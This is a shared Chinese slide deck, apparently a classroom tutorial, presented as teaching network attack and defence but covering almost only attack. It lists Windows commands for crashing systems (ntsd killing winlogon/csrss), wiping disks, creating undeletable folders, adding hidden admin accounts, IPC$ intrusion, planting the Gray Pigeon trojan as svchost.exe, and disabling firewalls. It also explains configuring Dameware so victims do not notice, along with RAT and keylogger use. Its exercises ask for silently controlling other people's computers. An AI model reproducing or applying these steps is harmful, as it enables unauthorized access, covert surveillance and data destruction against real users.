资源描述:
《网络安全攻防技术教程PPT模板》由会员上传分享,免费在线阅读,更多相关内容在PPT专区-天天文库。
网络安全攻防技术教程网络净化安全保障智能防护汇报人:xxx时间:20XX.X.XX
1目录01常用的DOS命令02常用的入侵命令03纯DOS命令入侵04图形界面的入侵05流行远程控制木马的使用方法06键盘记录程序的使用方法CONTENTS
2常用的DOS命令网络净化安全保障智能防护PART01
3常用的DOS命令Cd切换目录Dir列出所有文件信息Del删除文件Md创建目录Rd删除目录Copy复制Xcopy复制文件和文件夹Cls清屏Attrib修改文件、文件夹属性Date、Time显示日期、时间
4常用的DOS命令Path系统路径Set显示、设置系统信息Ren(Rename)重命名Subst虚拟磁盘Ver显示操作系统版本Help帮助/?显示某条命令的帮助
5非主流DOS命令101重复执行某条命令直至死机的批处理代码:startcmd%002复制一个文件的磁盘的每个子文件夹当中:for/r/d%ain(*)docopytest.txt"%a"/y03不停地执行同一条命令:for/l%ain(1,0,2)donetsend192.168.1.1"炸弹来了!"04死机,蓝屏ntsd-cq-pnwinlogon.exentsd-cq-pncsrss.exe
6非主流DOS命令105删除磁盘所有文件:del*/a/s/q/f06创建名字为空的文件夹:md(按住Alt键,在小键盘上按2,5,5,然后松开Alt,回车)07创建无法删除的特殊名字文件夹:md\\.\c:\conmd\\.\c:\aux08创建无法双击打开无法删除的另类文件夹:mdtest..\rdtest..\/s/d
7常用的入侵命令网络净化安全保障智能防护PART02
8常用的入侵命令●netuser用户名密码/add(建立用户)●netlocalgroupadministrators用户名密码/add(将用户加到管理员,使其拥有管理权限)●netuserguest/active:Yes(激活guest用户)●netuserguest12345(修改guest密码为12345)●netuser(查看账号属性)●netuse\\ip\ipc$“”/user(建立空IPC连接)●netuse\\ip\ipc$“密码”/user:“用户名”(建立IPC非空连接,非空链接就是需要帐户和密码)●netuse\\ip\ipc$/del(删除IPC空连接)●netusez:\\127.0.0.1\c$(映射目标主机磁盘c盘到本地磁盘Z盘)
9常用的入侵命令●netstart(查看开启了哪些服务)●netstart服务名(开启服务)●nettime\\目标IP(查看对方时间)●netview(查看局域网中开启了哪些共享)●netshare(查看本地开启的哪些共享)●netshareC$/del(删除C盘默认共享)●netstat-an(查看计算机开放了哪些端口)●Copyxx.exe\\ip\admin$\System32(将当前xx.exe复制到对方Admin$共享的System32目录内)
10常用的入侵命令●scconfigtlnesvrstart=auto(修改telnet服务的启动方式为自动,auto前面有一个空格)●netstopsharedaccess(关闭系统自带的防火墙)●netsendIP消息(利用messenger服务向目标IP发送消息)●ntsd-cq-pnwinlogon.exe(蓝屏重启)●ntsd-cq-pncsrss.exe(死机)●tasklist(查看进程)●taskkill(结束进程)
11纯DOS命令入侵网络净化安全保障智能防护PART03
12实战:纯DOS命令入侵●netuse\\xxxx$“123”/user:”administrator”●nettime\\xxxxx●Copyc:\server.exe\\xxxxxxx\admin$\svchost.exe●At\\1xxxxxxxx12:00startc:\windows\svchost.exe这样,对方就中了灰鸽子服务端了。
13几个小例子01开启禁用的telnet服务scconfigtlntsvrstart=auto(auto前有空格)02开启3389远程终端regadd03开启C盘默认共享netsharec$=c:04开启计划任务服务(at命令需要这一服务)netstartschedule02开启远程注册表(RemoteRegistry)服务netstartremoteregistry
14图形界面的入侵网络净化安全保障智能防护PART04
15图形界面的入侵计算机管理01操作菜单→连接到另一台计算机注册表编辑器02文件菜单→连接网络注册表第三方工具03比如Dameware、Pcanywhere
16流行远程控制木马的使用方法网络净化安全保障智能防护PART05
17Dameware的隐藏用Dameware控制对方,要做到悄无声息,需要注意以下几点:01点帮助菜单→激活软件,输入注册码注册软件;02在远程连接对话框上单击“设置”,勾选:“查看模式”和“显示远程鼠标指针”;03切换到“安装选项”选项卡,勾选上“复制配置文件”然后点“编辑”;04把“附加设置”选项卡上“允许托盘图标”勾掉;05再把“通知对话”选项卡上“连接时通知”勾掉。
18XP默认不能远程控制的原因●在运行中输入命令secpol.msc打开安全策略●展开“本地策略”“安全选项”(红色表示默认选项)●“安全选项:本地账户的共享和安全模式”▲经典,表示在远程可以拥有管理员权限▲仅来宾,表示在远程只能拥有guest权限●“账户:使用空白密码的账户只允许进行控制台登录”▲启用,账户密码为空则不允许远程访问▲禁用,账户密码为空也允许远程访问●所以,要想控制系统为XP的计算机,必须考虑对方安全策略的设置。●安全策略的设置不影响利用木马进行控制。
19灰鸽子以华夏灰鸽子2009为例,注意事项:IP地址栏一定要填写自己的IP地址,而且不要忘了加上冒号和端口号
20键盘记录程序的使用方法网络净化安全保障智能防护PART06
21键盘记录以“keyghost”和“简单键盘记录程序”为例
22实验任务练习前面PPT中的DOS命令●开一台2003虚拟机,利用命令入侵,以能够telnet到对方电脑为入侵成功的标志●开一台2003虚拟机,利用图形界面入侵,以能够控制对方桌面为入侵成功的标志●使用远控软件Dameware控制别人电脑(要求:悄无声息,不能被对方发现)●利用灰鸽子控制别人电脑
23谢谢观看网络净化安全保障智能防护汇报人:xxx时间:20XX.X.XX
